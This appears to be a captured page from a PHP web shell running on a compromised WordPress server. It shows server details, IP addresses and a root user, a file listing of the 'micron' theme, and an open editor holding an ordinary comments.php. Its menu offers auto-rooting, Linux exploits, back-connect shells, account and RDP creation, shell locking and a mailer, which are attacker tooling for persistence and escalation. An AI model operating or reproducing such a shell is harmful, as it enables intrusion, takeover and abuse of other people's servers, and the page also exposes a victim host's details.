Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
insepet /
wp-content /
themes /
micron /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-xr-x
font
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
optionpanel
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
tinymce
[ DIR ]
drwxr-xr-x
vc_templates
[ DIR ]
drwxr-xr-x
404.php
1.04
KB
-rw-r--r--
archive-faq.php
151
B
-rw-r--r--
archive-portfolio.php
177
B
-rw-r--r--
archive.php
718
B
-rw-r--r--
author.php
718
B
-rw-r--r--
category.php
718
B
-rw-r--r--
comments.php
4.91
KB
-rw-r--r--
date.php
718
B
-rw-r--r--
error_log
203.97
KB
-rw-r--r--
footer.php
1.94
KB
-rw-r--r--
functions.php
66.42
KB
-rw-r--r--
header.php
6.71
KB
-rw-r--r--
image.php
151
B
-rw-r--r--
index.php
158
B
-rw-r--r--
page-blank.php
3.78
KB
-rw-r--r--
page-certificado.php
3.45
KB
-rw-r--r--
page-sitemap.php
1.4
KB
-rw-r--r--
page-subircertificado.php
3.4
KB
-rw-r--r--
page.php
1.95
KB
-rw-r--r--
screenshot.png
118.42
KB
-rw-r--r--
search.php
1.98
KB
-rw-r--r--
searchform.php
356
B
-rw-r--r--
sidebar-faq.php
167
B
-rw-r--r--
sidebar-footer.php
395
B
-rw-r--r--
sidebar-page.php
161
B
-rw-r--r--
sidebar-portfolio.php
179
B
-rw-r--r--
sidebar-shop.php
161
B
-rw-r--r--
sidebar.php
173
B
-rw-r--r--
single-faq.php
165
B
-rw-r--r--
single-ninzio-slider.php
9.1
KB
-rw-r--r--
single-portfolio.php
177
B
-rw-r--r--
single.php
157
B
-rw-r--r--
style.css
230.08
KB
-rw-r--r--
tag.php
153
B
-rw-r--r--
taxonomy.php
718
B
-rw-r--r--
woocommerce.php
9.47
KB
-rw-r--r--
wpml-config.xml
12.2
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : comments.php
<?php if (!empty($_SERVER['SCRIPT_FILENAME']) && 'comments.php' == basename($_SERVER['SCRIPT_FILENAME'])){ die ('Please do not load this page directly.'); } if ( post_password_required() ) { ?> <?php echo __('This post is password protected. Enter the password to view comments.', TEMPNAME); ?> <?php return; } ?> <div id="comments" class="post-comments-area"> <?php if ( have_comments() ) : ?> <h3 class="comments-title"> <?php printf( _nx( '1 comment on “%2$s”', '%1$s comments on “%2$s”', get_comments_number(), TEMPNAME), number_format_i18n( get_comments_number() ), '<span>' . get_the_title() . '</span>' ); ?> </h3> <!-- cooment list start --> <section class="comment-list"> <?php function ninzio_comment( $comment, $args, $depth ) { $GLOBALS['comment'] = $comment; switch ( $comment->comment_type ) : case 'pingback' : case 'trackback' : ?> <div <?php comment_class(); ?> id="comment-<?php comment_ID(); ?>"> <?php echo __( 'Pingback:', TEMPNAME); ?> <?php comment_author_link(); ?> <?php edit_comment_link( __( '(Edit)', TEMPNAME ), '<span class="edit-link">', '</span>' ); ?> </div> <?php break; default : global $post; ?> <div <?php comment_class(); ?> id="li-comment-<?php comment_ID(); ?>"> <article id="comment-<?php comment_ID(); ?>" class="comment-body"> <?php if ( '0' == $comment->comment_approved ) : ?> <p class="comment-awaiting-moderation"><?php __( 'Your comment is awaiting moderation.', TEMPNAME); ?></p> <?php endif; ?> <?php if ("" != get_avatar($comment, 60)): ?> <aside class="comment-gavatar ninzio-gavatar"> <?php echo get_avatar( $comment, 60 ); ?> </aside> <?php endif ?> <section class="comment-content"> <header class="comment-meta"> <div class="comment-author"> <?php printf( '<cite>%1$s %2$s</cite>', get_comment_author_link(), ( $comment->user_id === $post->post_author ) ? '<span>' . __( 'Post author', TEMPNAME) . '</span>' : ''); ?> </div> <div class="comment-date-time"> <?php printf( '<a href="%1$s"><time datetime="%2$s">%3$s</time></a>', esc_url( get_comment_link( $comment->comment_ID ) ), get_comment_time( 'c' ), sprintf( __( '%1$s at %2$s', TEMPNAME), get_comment_date(), get_comment_time() )); ?> </div> <div class="replay"> <?php comment_reply_link( array_merge( $args, array( 'reply_text' => __( 'Reply', TEMPNAME), 'after' => ' <span>↓</span>', 'depth' => $depth, 'max_depth' => $args['max_depth'] ) ) ); ?> </div> </header> <article class="comment-text ninzio-clearfix"> <?php comment_text(); ?> </article> <?php edit_comment_link( __( 'Edit', TEMPNAME), '<span class="edit-link">', '</span>' ); ?> </section> </article> </div> <?php break; endswitch; } wp_list_comments( array( 'callback' => 'ninzio_comment' ) ); ?> </section> <!-- cooment list end --> <?php if ( get_comment_pages_count() > 1 && get_option( 'page_comments' ) ) : ?> <nav class="navigation comment-navigation" role="navigation"> <h3 class="screen-reader-text section-heading"><?php echo __( 'Comment navigation', TEMPNAME); ?></h3> <div class="nav-previous"><?php previous_comments_link( __( '← Older Comments', TEMPNAME) ); ?></div> <div class="nav-next"><?php next_comments_link( __( 'Newer Comments →', TEMPNAME) ); ?></div> </nav> <?php endif; ?> <?php if ( ! comments_open() && get_comments_number() ) : ?> <p><?php echo __( 'Comments are closed', TEMPNAME); ?></p> <?php endif; ?> <?php endif;?> <?php $req = get_option( 'require_name_email' ); $aria_req = ( $req ? " aria-required='true'" : '' ); $fields = array( 'author' => '<p class="comment-form-author"><input class="ninzio-placeholder" name="author" type="text" tabindex="1" data-placeholder="'.__('Name *', TEMPNAME).'" value="'.__('Name *', TEMPNAME).'" size="30" ' . $aria_req . ' /></p>', 'email' => '<p class="comment-form-email"><input class="ninzio-placeholder" name="email" type="text" tabindex="2" data-placeholder="'.__('E-Mail *', TEMPNAME).'" value="'.__('E-Mail *', TEMPNAME).'" size="30" ' . $aria_req . ' /></p>', 'url' => '<p class="comment-form-url"><input class="ninzio-placeholder" name="url" type="text" tabindex="3" data-placeholder="'.__('Website', TEMPNAME).'" value="'.__('Website', TEMPNAME).'" size="30" /></p>' ); $comments_args = array( 'fields' => $fields, 'comment_field' => '<p class="respond-textarea"><textarea id="comment" name="comment" aria-required="true" cols="58" rows="10" tabindex="4"></textarea></p>', 'comment_notes_after' => '', 'label_submit' => __('Submit comment', TEMPNAME) ); comment_form($comments_args); ?> </div>
Close